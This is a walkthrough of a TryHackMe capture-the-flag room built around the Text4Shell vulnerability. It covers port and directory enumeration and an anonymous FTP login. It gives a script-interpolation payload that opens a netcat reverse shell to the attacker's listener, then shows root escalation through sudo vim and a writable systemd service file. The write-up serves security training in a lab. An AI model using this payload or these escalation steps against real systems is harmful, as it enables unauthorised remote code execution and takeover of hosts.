TryHackMe : Text4shell Writeup

Photo by Zanyar Ibrahim on Unsplash

Hello Hackers! Dive Deep into the TXT4Shell TryHackMe Room: An Exclusive Walkthrough of My Custom CTF Challenge

In this blog, I’m excited to take you through a detailed walkthrough of my latest creation on TryHackMe: the TXT4Shell room. This room is designed to challenge your skills in cybersecurity, testing your knowledge of various vulnerabilities and exploitation techniques. Whether you’re a seasoned CTF player or a curious beginner, this walkthrough will guide you through the entire process, from initial enumeration to the final exploitation.

We’ll explore the unique aspects of the TXT4Shell challenge, including the inspiration behind its design, the specific vulnerabilities it targets, and the thought process involved in crafting the scenarios. I’ll provide step-by-step instructions, insightful tips, and screenshots to ensure you understand every detail.

By the end of this walkthrough, you’ll not only have pwned the TXT4Shell room but also gained valuable insights that will help you tackle similar challenges in the future. So, let’s dive in and start hacking!

Room Link

https://tryhackme.com/jr/text4shell

Note

After starting the machine please wait for 5 min for all the services will start properly.

Reconnaissance

TCP Scan

First thing first, we run a quick initial nmp scan to see which ports are open and which services are running on those ports.

nmap -sC -sV -O -oA nmap/initial $IP

• -sC: run default nmap scripts
• -sV: detect service version
• -O: detect OS
• -oA: output all formats and store in file nmap/initial
• $IP: put here the machine IP address

We get back the following result showing that these ports are open:

• Port 21: running File Transfer Protocol (FTP) version 3.0.5. This allows anonymous login so we should keep that in mind.
• Port 22: running OpenSSH version 8.2p1 .
• Port 80: running default apache2 landing page

Before we start investigating these ports, let’s run more comprehensive nmap scans in the background to make sure we cover all bases.

Let’s run an nmap scan that covers all ports.

nmap -sC -sV -O -p- -oA nmap/full $IP

• -p- flag is used for cover all ports

Result

• Port 8080: Http-proxy is running and it is also mentioned in hint tab(interesting)

UDP Scan

nmap -sU -O -oA nmap/udp $IP

Noting found …

Enumeration

Let’s enumerate more to determine if any of these services are either misconfigured or running vulnerable versions.

Port 21 vsftpd v3.0.5

anonymous login is allowed with the username : anonymous

Here, I did test for file upload with PUT command but it doesn’t work but one file is present named msg.txt get it with GET command and noting found special in that msg. I think it is a rabbithole

Port 22 OpenSSH v8.2p1 Ubuntu 4ubuntu0.11

Not vulnerable with RCE

Port 80 Apache httpd v2.4.41

here we found a file named robots.txt

content of robots.txt

User-agent:*
Disallow: /cgi-bin/
Disallow: /dev/

inside /cgi-bin/ folder we found nothing

inside /dev we found a file named as secret.txt

content of secret.txt

From Testing Department
Hello developers netcat can't execute commands on server you can use traditional netcat commands

Here, I don’t know what he is saying i think netcat-traditional should be installed instead of plain netcat on the server by testing team.

Directories Enumeration

Let’s do more enumeration on the web server. Run gobuster to enumerate directories.

└─# gobuster dir -t 10 -w /usr/share/wordlists/dirb/common.txt -u 10.10.74.48

• -t: number of threads
• -w: wordlist
• -u: specify the URL
• dir: uses directory/file brute forcing mode

The directories /dev /cgi-bin lead us nowhere.

Enumerate with Dirsearch

─# dirsearch -u 10.10.74.48

• -u: used to specify target url

Fount a file named test.php

It exposes the machine name : pwnbox

Port 8080

Here, Java Spring boot web page is hosted and states that input in name field as shown below.

Hello HACK3R5
Send your name to /fun?name=yourname
and see the fun!

After some hints from box name and extra research i found that it is vulnerable to text4shell

Gaining a foothold

As we found that it may be vulnerable to RCE so let’s exploit it.

If we pass any thing in name field it is reflecting as it is and if we leave it blank it shows the default name that is

It may be vulnerable to various kind of bugs like XXS but here in this writeup i will cover only text4shell exploitation.

Prepare your Host Machine to listen incoming request from target machine.

Type below command in your host machine

nc -lvnp 4444

The command nc -lvnp 4444 is used with Netcat (nc), a versatile networking utility. Here’s a breakdown of what each option does:

• -l: Listen mode. This tells Netcat to listen for incoming connections.
• -v: Verbose mode. This option provides more detailed output.
• -n: Numeric-only IP addresses, no DNS resolution. It prevents Netcat from attempting to resolve hostnames, working directly with IP addresses.
• -p 4444: Specifies the port number (4444 in this case) to listen on.

In summary: The command nc -lvnp 444 will make Netcat listen on port 4444 for incoming connections, providing verbose output and avoiding DNS resolution. This is often used in reverse shells or for setting up a simple server to receive connections.

Find your host machine IP

ifconfig

Your IP is found in tun0 interface which is 10.9.0.70

Prepare your payload

payload:

${script:javascript:java.lang.Runtime.getRuntime().exec('nc.traditional -v $target_IP $target_PORT -e /bin/bash ')

• $target_IP=10.9.0.70 (in my case your ip may be different)
• $target_PORT=4444

Note: Encode your payload with url encoder or burpsuite

Now, Pass it in name field and wait for response

WOW I got my foot!

Using an inefficient shell to use bash shell, feed the following command.

python3 -c "import pty;pty.spawn('/bin/bash')"

whoamiiduname -a

• whoami: print effective userid
• id: print real and effective user and group IDs
• uname -a: print system information

We found user flag.

We discovered the user.txt file after investigating the computer; don’t forget to decrypt it. It’s the pwnboy user’s password.

Privilege Escalation

Next, I need to figure out what other privileges I have or can easily get. The following command lists the allowed commands for my user.

sudo -l

After Running LINPEAS Script on target machine we found two ways to escalate the privilege.

Method 1 : Abuse Sudo access

We can run the vim with sudo access

Type below command

sudo vim

Then,

Your can refer https://gtfobins.github.io/gtfobins/vim/#sudo to exploit it.

We found Root flag

Method 2: Abuse Service File

We fount that service file is configured with incorrect permission so, it become write able with user pwnboy and it is responsible for the java spring boot service running on port 8080

Let’s Temper the myscript.service file and change the user with user=root

Restart the service and exploit it same as you have done in initial foothold.

We found root flag

Thank you for following along with this walkthrough of the TXT4Shell TryHackMe room!

If you enjoyed this post, found it helpful, or have any feedback, I’d love to hear from you! Don’t forget to:

• Like this article to show your support.
• Share it with fellow hackers and friends who might find it useful.
• Follow me on Medium and LinkedIn to stay updated on more CTF write-ups, cybersecurity tips, and exclusive content.

Happy hacking, and see you in the next challenge!